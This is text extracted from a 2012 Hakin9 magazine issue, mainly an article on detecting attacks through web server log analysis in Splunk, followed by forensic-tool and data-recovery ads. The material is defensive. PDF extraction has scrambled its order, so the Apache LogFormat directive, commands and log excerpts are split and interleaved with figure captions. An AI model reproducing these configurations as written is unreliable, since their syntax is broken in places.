is an Enterprise Architect and author in the UK financial services industry; working with security, Java/JavaEE, networking, Unix/Linux and general architecture in the UK. He also more than dabbles in the world of psychology, human learning, and astronomy with particle physics etc ; having studied IT, aeronautical engineering, social sciences and more in his life as an eternal part time student. When not working, writing or being verbally abused by his children; he loves photography, singing, playing guitar, drinking wine, and chatting for hours on end with his friends elsewhere in the world certain of whom he competes with, but would love to spend more real time on the same country with. Colin is always happy to help anyone and loves fine technical debate that involves improving the state of the industry and mankind.

38

9/2012 (16)

Hakin9 EXTRA

Web Server Log AnALySIS


DetectIng bAD Stuff HIttIng your Web Server
KIm HALAvAKoSKI

Web Servers on the Internet are under constant attack. Defending your web server requires vigilant response times and in-depth log analysis to be able to detect, remediate and track ongoing attacks. WAFs are today a common tool in defending high-profile websites. One often forgotten aspect of any technology is the log analysis. Products and technologies are often installed as a countermeasure to observed attacks, but the real valuable part is usually forgotten: Log analysis. Without properly analysing the logs defending against the ever changing threat landscape and evolving attack methods can be challenging. This article will show some basic methods, tools and products for analysing the logs and detecting the bad stuff targeting your website.

unning a website is fairly easy today. Websites are hosted by various hosting providers and are relatively easy to setup even for the novice webmaster / sysadmin. I will not go into detail on how to setup a website in this article but instead I will try to take a quick dip into the world of log management. In this article I will show how to do some simple log analysis for a web server. I will use Splunk(http://www.splunk. com) for analysing the logs and setting up alerts and reports that will help in detecting bad stuff hitting the website.

# rpm -i splunk_version_package_name.rpm

To install Splunk in a non-default directory run the installation with the --prefix tag:
# rpm -i --prefix=/another/directory/ splunk_version_package_ name.rpm

Installing Splunk

To upgrade an existing installation of Splunk installed in the /opt directory:


# rpm -U splunk_version_package_name.rpm

There are various different log management solutions out on the market at various price levels. In this article I have used Splunk. Splunk is a commercial log engine that eats logs and makes them searchable and reportable. Splunk has a free version that can index 500Mb per day. If more indexing power is needed, youll need to get a commercial license. Installing splunk is easy. It comes packaged for Windows, Linux, OS X, Solaris, AIX, FreeBSD and HP-UX. Just install the splunk package as you would normally install a package on the OS you use. Installing Splunk on a RPM based system goes like this: Install the Splunk in the default /opt directory run the following command:

To upgrade an existing installation of Splunk that was installed in a different directory use the --prefix flag:
# rpm -U --prefix=/opt/existing_directory package_name.rpm splunk_version_

You should then have Splunk installed and can start indexing log files and doing log analysis on your logs. You can now start Splunk by running the following command: # $SPLUNK_HOME/bin/splunk start

40

9/2012 (16)

Web server Log Analysis

If you want to start Splunk automatically at boot time run the following command:
./splunk enable boot-start

configuring Splunk

To get data indexed and searchable in splunk it needs to eat some log data. The easiest way is to point splunk at the directory where the log files exist and start indexing the log files in that directory. There are many ways of adding data to splunk. To add data go to Splunk Manager and then click Data Inputs:

Figure 5: Preview data

Figure 1: Data inputs

Then on the next screen click Add data:

Splunk will then proceed and let you preview the logfiles you are about to index and finally let you configure some settings for the indexed files. Just proceed and click save on the last page to index the logs. Splunk is very versatile and can index almost any data on disk and even from the network and function as a regular syslog daemon, as well as receive data from other splunk instances. Pretty nice! For more detailed instructions on Splunk please go to the tutorial documentation pages at http://docs.splunk.com/Documentation/Splunk/latest/User/WelcometotheSplunktutorial

Figure 2: Add data

Analysing the log files

Then proceed and click the a file or directory of files to point Splunk at a directory where the log files exist:

The most useful feature of Splunk is analysing and correlating logs. If you have ever searched log files on a linux server using grep, uniq, awk, sed and similar tools to mangle the logs to your liking, then you will love Splunk. Its like having all those tools, but on steroids, in your browser! Its like Google for your logs! Here is the main search screen in Splunk. Looks pretty normal and boring and nothing special here(yet):

Figure 3: Adding data to splunk

Figure 6: Splunk main search screen

Next, choose the first option Consume any file on this Splunk servrer and click Next:

This is where most of the magic will happen. Now it is time to dive into some log searching and correlating. We are supposed to do some web server log analysis, so one thing to look at might be web server HTTP status codes. I have configured my apache2 webserver with some extended logging to catch almost everything that apache2 can spit out. Here is my LogFormat directive in apache2.conf:
LogFormat remote-host=%h remote-ip=%a canonical-port=%p %H keepalive=%k request-method=%m process-id=%P query-string=%q request-line=%r handler=%R http-status-code=%s http-request-time=%t

response-size=%B request-time-taken=%D request-protocol=

Figure 4: Add files to be indexed

request-time-taken=%T remote-user=%u http-request-url= %U servername-canonical=%v servername=%V http-connection-status=%X http-bytes-received=%I http-bytes-sent=%O http-referer=\%{Referer}i\ http-user-agent=\%{User-Agent}i\ extended

Then finally add the patch to the directory or log file you would like to be splunked:

www.hakin9.org/en

41

Hakin9 EXTRA
As you can see, I am logging almost all attributes possible and in key-value pairs, which makes Splunk field extraction much easier which you will see in a minute. So how do I find out what status codes are present in my web server logs? With the LogFormat above, just search type http in the search field and hit enter to see some results for the keyword http from the logs:

Figure 9: HTTP status code timechart

Figure 7: Searching for logs containing http

And voil! There you can see how HTTP status codes are dispersed in the log over the last 24 hours. Pretty neat or what? To optimize the chart you can stack the status code values in one column instead of having one column per code by clicking Options and choosing stacked mode:

So now we can see logs containing the keyword http. The timeline with columns shows the occurrence of http in the logs over a time period. The left area below shows the discovered fields. Here I have added some discovered fields by clicking edit and adding interesting fields to my splunk results window.

Figure 10: Chart stacked mode selection

With stacked mode the columns look nicer and compress more data into the same view and make it generally more pleasant to look at. I am no visualization expert, just an avid practitioner. However if you want good advice on data visualization then go get Raffael Martys Applied Security Visualization and Greg Contis Security Data Visualization books, which go into deep details about security data visualization theory.

Figure 8: Add extracted fields to the search

I have chosen the discovered fields http_status_code, http_ bytes_received, http_bytes_sent, http_request_time, http_request_url and http_user_agent. You can see that these field names match with the Apache2 LogFormat directive that I have configured. You can choose whatever fields you like and they will show as fields in the main search view and can also be used in splunk searches. So if we now want to see the HTTP status codes we can easily do that by searching for http_status_code, but now well add a nice twist to the search to a visualization on what status codes are present over a time period. Use the following search query in the search window and hit enter:
http | timechart count by http_status_code

Figure 11: HTTP status code timechart - stacked

From this graph we can easily find abnormal outliers in the logs. What are those 404-errors that stick out? Lets have a look! Just click on the chart and Splunk will adjust the search to the specific time and HTTP status code you clicked on. In this case, clicking on the purple 404 column will apply the following search term:
http http_status_code=404

And show the results of that search:

42

9/2012 (16)

Web server Log Analysis

Now lets dive into some more serious features, analysis and correlation. Splunk also has the ability to do File Integrity Monitoring(FIM), which is a way of tracking changes on files on the system. If a file is modified, alarms can be triggered. This becomes useful if one wants to track what is going on the system and if somebody is doing unauthorized changes on configuration files, web pages or other critical files on the system. The FIM feature is configured by adding a fschange stanza to the splunk /opt/splunk/etc/system/local/inputs.conf configuration file:
[fschange:/etc/]

Figure 12: HTTP status code timechart - clicked results

In this case it seems to be some missing attachments on my web server that somebody has tried to access. Some other interesting information to search for in web server logs are http_referer and http_user_agent strings. Who is referring to your website and what does the HTTP User Agent strings in your logs tell about your users web browser preferences? Searching for http_referer and negating away my own domain from the results will give a nice overview chart showing me what referers are hitting my website. Here I have chosen not to include my own domain referers in the results by using the NOT operator to negate results containing blackcatsec:
http NOT http_referer=*blackcatsec* | timechart count by http_ referer

This makes Splunk track all changes on files in the /etc directory. In order to track all commands and behaviour on my system I am using a program called snoopy. Snoopy is a library that gets preloaded to every executed file on a Linux system. The library is added to the /etc/ld.so.preload file and after that all system level execs are logged. Lets take a look at what we can find from these logs. All FIM events are logged with source=fschangemonitor so searching for that source will show all file system changes:
source=fschangemonitor

Figure 15: Splunk File Integrity Monitoring Logs

Figure 13: HTTP Referers timechart

Searching for HTTP User Agents is equally easy:


http | timechart count by http_user_agent

Here we can see files that have been changed in /etc during the last 30 days search span. One thing that pops out is the 2790 events on September 3rd. What happened on that day? Clicking on the column in the timeline will again modify the search to only include events from that day. What immediately pops out is the /etc/compromised.file that has been added to the filesystem. What is that about? Who did that? By searching for compromised.file in the search field we can now get a listing of all log events containing compromised.file:

Figure 14: HTTP User Agent Timechart

As you can see, these kind of tools can be very effective in searching logs for anomalies and weird malicious behaviour.

Figure 16: Splunk File Integrity Monitoring Details for /etc/compromised.file

www.hakin9.org/en

43

Hakin9 EXTRA
Here we can see from the snoopy logs that the user root touched the /etc/compromised.file and then proceeded to edit the file:
Sep 3 23:06:22 panther snoopy[3893]: [uid:0 sid:22035

Log correlation

tty:/dev/pts/0 cwd:/etc filename:/usr/bin/touch]: touch compromised.file

Immediately followed by Splunks fschange event:


Mon Sep 3 23:06:24 2012 action=add, path=/etc/compromised. 3

file, isdir=0, size=0, gid=0, uid=0, modtime=Mon Sep 23:06:22 2012, mode=rw-r--r--, hash=

Root then proceeded to edit and modify the file, again detected by Splunk:
Sep 3 23:07:12 panther snoopy[4093]: [uid:1000 sid:22035

One useful feature in Splunk is the ability to correlate logs from various sources. One simple and effective way of correlating different logs over a narrow time period is to first drill down on an specific event to have Splunk narrow down the timeline. Then, when the timeline is focused on a specific period in time, remove the search terms. Splunk will then show all events received during that specific time frame. This gives an opportunity to see what else happened during the time you are focusing your search on. Perhaps you searched on a firewall event and want to see what else happened around that time. Did something get logged in apache, postfix, or some other daemon running on your server? Did the specific IP-address that hit your webserver do something else? Perhaps it scanned your server and you can see traces of the scan in your firewall logs?

Alerts

tty:/dev/pts/0 cwd:/etc filename:/usr/bin/vi]: vi compromised.file 3 23:07:26 2012 action=update,

Mon Sep

path=/etc/compromised.file, isdir=0, size=0, gid=0, uid=0, hash=, chgs=mode modtime=Mon Sep 3 23:06:22 2012, mode=rw-rw-rw-,

Another nice feature are the alerts. Splunk can be setup to send alerts for saved searches. In the following examples I have setup an email alert for each time my server running sshguard automatically blocks an IP-address using iptables when a predefined number of failed logins occur. First I search for all sshguard blocking events:
sshguard blocking

From the snoopy logs we can see that the uid is 1000 and sid is 22035. Searching for this information gives us a pretty clear picture of what happened on the system:

Figure 18: SSH Guard blocking Figure 17: Splunk File Integrity Monitoring Details for /etc/compromised.file with sid
Sep 3 22:27:00 panther snoopy[24092]: [uid:1000 sid:22035

Then create an alert by clicking Create and then Alert. Fill in the alert name and proceed to fill in the details and email address where the alert will be sent when found in the logs.

tty:/dev/pts/0 cwd:/home/khalavak filename:/usr/bin/sudo]: sudo su 3 23:06:17 panther snoopy[3887]: [uid:1000 sid:22035

Sep

tty:/dev/pts/0 cwd:/etc filename:/usr/bin/sudo]: sudo touch compromised.file

Sep

tty:/dev/pts/0 cwd:/etc filename:/usr/bin/sudo]: sudo chmod 666 /etc/compromised.file

3 23:06:34 panther snoopy[3911]: [uid:1000 sid:22035

Sep

tty:/dev/pts/0 cwd:/etc filename:/usr/bin/vi]: vi compromised.file

3 23:07:12 panther snoopy[4093]: [uid:1000 sid:22035

Figure 19: Configuring Alert Schedule

From these logs we can see that the user khalavak became root by using sudo and then proceeded to touch, chmod and vi the suspicious file.

44

9/2012 (16)

Web server Log Analysis

do the actual log analysis and decide what needs to be investigated - what is a false positive, what is good and what is bad. Tools will take us half the way, but the people analysing the logs are the ones who make the difference.

Figure 20: Configuring Alert Actions

Figure 21: Configure Alert Sharing

Figure 22: Alert Saved Successfully

Creating alerts for interesting and known issues helps in creating good situational awareness and can help in cutting down the remediation time for an incident.

conclusion

Log management and analysis can be difficult and time consuming. It can be very hard to do without the right people who possess the right mindset and utilize the right tools. Tools that help administrators and security analysts to easily visualize and correlate log events can be extremely useful. They help log analysts to find and remediate issues found in the vast amount of logs which are generated by servers. But one has to remember that the tool alone is not good enough, we still need people to

KIm HALAvAKoSKI
is the CSO of an undisclosed financial services provider, with a solid background in network security management and architecture. He also dreams of doing pentesting professionally in the near future. When not doing security work, he enjoys spending time with his fiance, 3 children and 5 cats. Hobbies include, but are not limited to, photography, robotics, RC-airplanes, quadcopters and stuff with electronics.

www.hakin9.org/en

45

Hakin9 EXTRA

Special edition for forenSic profeSSionalS:


the MoSt advanced and effective new toolS froM atola technology
Atola Technology deeply values each customer and strives to offer only the latest innovative technologies for the data recovery professional. Atola has specifically designed two new powerful data recovery tools with intuitive ease of use for forensic specialists: Atola Forensic Imager and Atola Bandura.

Figure 1. Atola Forensic Imager

he Atola Forensic Imager is a high-quality professional tool designed that meets all expectations in advanced forensic operations. Its an all-in-one solution that easily works with damaged or unstable hard disk drives. It combines a fast imager with strong data recovery capabilities for creating accurate forensic images. The powerful Atola Imaging Software is bundled with the Atola DiskSense Ethernet Unit, which utilizes the most efficient interface connections. This professional tool has been developed with the ability to Customize every step. Key parameters can be adjusted during the Imaging process to make it more effective and successful for each specific case. The Quick and accurate erasing of hard drives works at maximum speed using any speci-

fied HEX pattern to overwrite the sectors. It can also execute the Security Erase function and perform Zero-Fill, NIST 80088 and DoD 5220.22-M compliant wiping. The Case Management System works automatically recording all important data such as date, time and hash values in one place. Archives of all past cases are stored on the host PC. The Automatic password removal function removes any user and level ATA password from a locked hard drive and displays the password to the technician. The Atola Forensic Imager is the one of the best solutions for forensic a professional. It guarantees careful attention to detail and precise data acquisition, and strong reliable security. All you need is in one tool!

46

9/2012 (16)

Special Edition for Forensic Professionals

Main features: Imaging damaged drives Calculating checksum on the fly (MD5, SHA1, 224, 256, 384, 512) Wiping/erasing DoD 5220.22-M method NIST 800-88 method Security Erase Fill with pattern Zero fill Automatic Password Removal Automatic Case Manager Main adjustable imaging parameters: Calculate checksum on the fly (MD5, SHA1, 224, 256, 384, 512) Disable GList with auto reallocation HEX pattern to fill skipped sectors (00 by default) Image file size (chunk size) Timeout length (after failed sector read attempt) Number of sectors to skip after failed read attempt Number of imaging passes Apply Read-Long command on last pass Reduce HDD operating speed to PIO mode Copy direction (forward/linear or reverse) Specify read/write heads to transfer from Abort duplication after X amount of HDD power cycles.

face that allows launching any task simply in just 2 touches, making all forensic operations easy and natural. Main features: Properly handles bad sectors and even severely damaged hard drives Super-fast on non-defective drives, functions at speeds up to 16 GB/min (265 MB/s) Multi-pass imaging (gets most data as quickly as possible on the first pass, then reads the rest) Ability to stop/resume duplication sessions anytime Disk diagnosis PCB, head stack, firmware, SMART, media, file system checks Checksum calculation: MD5, SHA1, SHA224, SHA256, SHA384, SHA512 Bad sector repair function HPA and DCO max address management Secure disk erasing with custom patterns at fast speeds up to 17 GB/min (280 MB/s) Super-easy to use. Features 3.3-inch full color touch screen display. Main forensic applications: Recovering data from damaged hard drives Secondary duplication tool to free up more expensive tools for other tasks Test disk drives for failures Secure data destruction (disk wipe) Cloning only occupied sectors (quick cloning) 1:1 write-protected data acquisition Disk comparison (locate sectors that are different on two drives) Dont miss a chance! Choose your own Atola tool! For more information on Atola Technology and their industry leading professional tools, visit www.atola.com

atola Bandura

The Atola Bandura is a unique stand-alone (no PC required), 2-port, HDD duplicator, wiper and tester. This indispensable tool provides powerful high-speed imaging, automatic testing, comparison, and secure data wiping. It easily works with damaged disk drives and properly handles all bad sectors. The Bandura system features an intuitive touch screen user inter-

Figure 2. Atola Bandura

www.hakin9.org/en

47

SeagateDataRecovery.com

Bad things can happen to your laptop. They dont have to happen to your data.
Seagate Data Recovery Services work on any disk drive.
Seagate takes the dread out of data mishaps. From accidental le deletions to physical hard disk damagefrom any brandwe make it easy to get your les back. With our No DataNo Recovery Charge Guarantee, our skilled professional data recovery technicians use cutting-edge technology to retrieve your data. And for your peace of mind, we also recover data from server applications and virtual technologies. Learn more at www.seagatedatarecovery.com.

2012 Seagate Technology LLC. All rights reserved. Seagate, Seagate Technology and the Wave logo are registered trademarks of Seagate Technology LLC in the United States and/or other countries. Seagate reserves the right to change, without notice, product offerings or specications.

Anda mungkin juga menyukai